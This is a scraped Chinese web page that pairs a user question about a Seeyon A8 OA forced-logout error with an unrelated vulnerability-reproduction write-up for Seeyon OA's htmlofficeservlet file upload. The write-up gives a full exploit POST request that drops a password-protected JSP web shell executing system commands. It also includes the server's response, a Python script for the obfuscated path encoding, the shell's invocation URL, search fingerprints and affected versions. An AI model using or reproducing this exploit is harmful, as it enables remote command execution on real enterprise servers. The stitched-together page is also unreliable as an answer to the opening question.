请问致远A8 OA协同办公软件打开文件时显示:被迫下线 与服务器失去联系,是啥原因?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了请问致远A8 OA协同办公软件打开文件时显示:被迫下线 与服务器失去联系,是啥原因?相关的知识,希望对你有一定的参考价值。

参考技术A 是有用户数限制的,或者服务器端没有安装好 参考技术B 打开ie浏览器的internet选项页面,在“高级”栏位中 点击“重置”按钮可以解决 被迫下线 问题 参考技术C 是不是加密狗松动了,找不到企业信息了

漏洞复现-致远OA

致远OA

致远A8-V5协同管理软件V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

漏洞指纹 fofa app=“用友-致远OA” “seeyon”
https://www.cnblogs.com/flashine/articles/14325665.html 复现
https://www.cnblogs.com/nul1/p/12803555.html

/seeyon/htmlofficeservlet

EXP

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>6e4f045d4b8506bf492ada7e3390d7ce

响应

DBSTEP V3.0     386             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

# qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\\\..\\\\..\\\\ApacheJetspeed\\\\webapps\\\\seeyon\\\\test123456.jsp
import base64

a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="  
b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out = ""

c = input("\\n1.加密  2.解密  0.退出\\n\\n请选择处理方式:")

while c != 0:
    out = ""
    if c == 1:
        str = raw_input("\\n请输入要处理的字符串:")
        str = base64.b64encode(str)
        for i in str:
                out += b[a.index(i)]
        print("\\n处理结果为:"+out)
    elif c == 2:
        str = raw_input("\\n请输入要处理的字符串:")
        for i in str:
                out += a[b.index(i)]
        out = base64.b64decode(out)
        print("\\n处理结果为:"+out)
    else:
        print("\\n输入有误!!只能输入“1”和“2”,请重试!")
    c = input("\\n1.加密  2.解密  0.退出\\n\\n请选择处理方式:")

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2022 13:01:42 GMT
Connection: close
Server: Seeyon-Server/1.0
Content-Length: 1116

DBSTEP V3.0     386             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLKhqUwAqUKEwfuXwiC6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) StringBuilder line = new StringBuilder();try Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) line.append(temp+"\\n");buf.close(); catch (Exception e) line.append(e.getMessage());return line.toString(); %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");elseout.println(":-)");%>

http://wyb0.com/posts/2019/seeyon-htmlofficeservlet-getshell/

https://blog.csdn.net/xd_2021/article/details/122232463

致远OA 登录框处存在Log4j2漏洞

请输入要处理的字符串:qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
b'..\\\\..\\\\..\\\\ApacheJetspeed\\\\webapps\\\\seeyon\\\\test123456.jsp'
 

test123456.jsp?pwd=asasd3344&cmd=ipconfig

致远A8-V5协同管理软件 V6.1SP2


v6.1 sp2
.A6 V7.1SP1
上传漏洞
https://www.cnblogs.com/bonelee/p/15160660.html

https://blog.csdn.net/weixin_43227251/article/details/115616761

致远 A8+ V7.1

公开日期:2021-06-03
漏洞编号:CNVD-2021-32773
危害等级:高危
漏洞描述:致远A8+协同管理软件存在命令执行漏洞

北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp1
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp2
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.0sp3
北京致远互联软件股份有限公司 致远A8+协同管理软件V7.1

远程任意文件上传文件上传漏洞
致远A8-V5协同管理软件 V6.1sp1
致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3
致远A8+协同管理软件V7.1

A6 员工敏感信息泄露https://blog.csdn.net/qq_42660246/article/details/116176625

http://www.javashuo.com/article/p-ejsncfjj-nu.html

以上是关于请问致远A8 OA协同办公软件打开文件时显示:被迫下线 与服务器失去联系,是啥原因?的主要内容,如果未能解决你的问题,请参考以下文章

用友致远A8 OA协同办公管理软件下载地址?

漏洞复现-致远OA

oa系统, 关联软件不正确,说是WPS和OFFICE不兼容,请问如何解决?

致远OA A8 htmlofficeservlet 任意文件上传漏洞 漏洞复现

致远A8任意文件写入漏洞_getshell_exp

致远A8系统:该条数据已被删除!